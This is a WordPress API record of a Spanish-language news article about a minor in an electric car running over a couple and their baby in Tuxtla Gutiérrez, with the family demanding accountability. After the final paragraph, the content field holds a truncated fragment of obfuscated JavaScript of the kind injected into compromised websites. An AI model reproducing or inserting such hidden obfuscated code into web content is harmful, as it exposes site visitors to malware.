{"id":20224,"date":"2025-02-06T05:41:14","date_gmt":"2025-02-06T05:41:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20224"},"modified":"2025-02-06T05:41:14","modified_gmt":"2025-02-06T05:41:14","slug":"piden-justicia-para-familia-atropellada","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20224","title":{"rendered":"Piden justicia para familia atropellada"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"543\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0017-543x1024.jpg\" alt=\"\" class=\"wp-image-20225\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0017-543x1024.jpg 543w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0017-159x300.jpg 159w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250205-WA0017.jpg 679w\" sizes=\"auto, (max-width: 543px) 100vw, 543px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>5 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Tres personas fueron atropellado en la zona centro de Tuxtla Guti\u00e9rrez, por ello familiares hicieron un llamado a las autoridades estatales para atender este tema ya que hasta el momento nadie se ha hecho responsable por lo ocurrido.<\/p>\n\n\n\n<p>Recordaron que, este accidente de tr\u00e1nsito ocurri\u00f3 el domingo 2 de febrero en la intersecci\u00f3n de la Calle Central y la 9\u00aa Avenida Sur en Tuxtla Guti\u00e9rrez, en el que un menor de edad al volante de un autom\u00f3vil el\u00e9ctrico BYD choc\u00f3 contra una unidad de transporte p\u00fablico y atropell\u00f3 a una pareja junto a su beb\u00e9 de cuatro meses.<\/p>\n\n\n\n<p>Este mi\u00e9rcoles en una denuncia p\u00fablica los familiares de las v\u00edctimas pidieron la intervenci\u00f3n del gobernador Eduardo Ram\u00edrez y del alcalde \u00c1ngel Torres, ya que hasta el momento nadie ha asumido la responsabilidad por los da\u00f1os y lesiones ocasionadas.<\/p>\n\n\n\n<p>Alberto Cordero, cu\u00f1ado de Mar\u00eda Fernanda Hern\u00e1ndez, la m\u00e1s afectada en el incidente, denunci\u00f3 que el menor responsable del accidente fue liberado por agentes de tr\u00e1nsito municipal que viajaban en la unidad PC-152.<\/p>\n\n\n\n<p>Sobre este punto dijo que al llegar a la Fiscal\u00eda Metropolitana, se enteraron que, el responsable ya no estaba detenido sin conocerse el motivo de la liberaci\u00f3n.<\/p>\n\n\n\n<p>Asimismo, se\u00f1al\u00f3 que el representante de Seguros BBVA intent\u00f3 condicionar el pago de los gastos m\u00e9dicos a cambio de que la familia otorgara el perd\u00f3n al responsable, propuesta que rechazaron.<\/p>\n\n\n\n<p>\u201cNosotros no queremos aprovecharnos de la situaci\u00f3n, \u00fanicamente que se hagan responsable de estos hechos, que paguen los gastos m\u00e9dicos\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>En este escenario hizo un llamado a los familiares del joven que conduc\u00eda la unidad que hagan consciencia y den la cara por estos hechos.<\/p>\n\n\n\n<p>As\u00ed mismo exigieron a las autoridades de tr\u00e1nsito que atendieron la emergencia que den una explicaci\u00f3n sobre la liberaci\u00f3n del conductor de la unidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 5 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Tres personas fueron atropellado en la zona centro de Tuxtla Guti\u00e9rrez, por ello familiares hicieron un llamado a las autoridades estatales para atender este tema ya que hasta el momento nadie se ha hecho responsable por lo ocurrido. Recordaron que, este accidente de tr\u00e1nsito ocurri\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20225,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20224","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20224","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20224"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20224\/revisions"}],"predecessor-version":[{"id":20226,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20224\/revisions\/20226"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20225"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20224"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20224"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20224"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}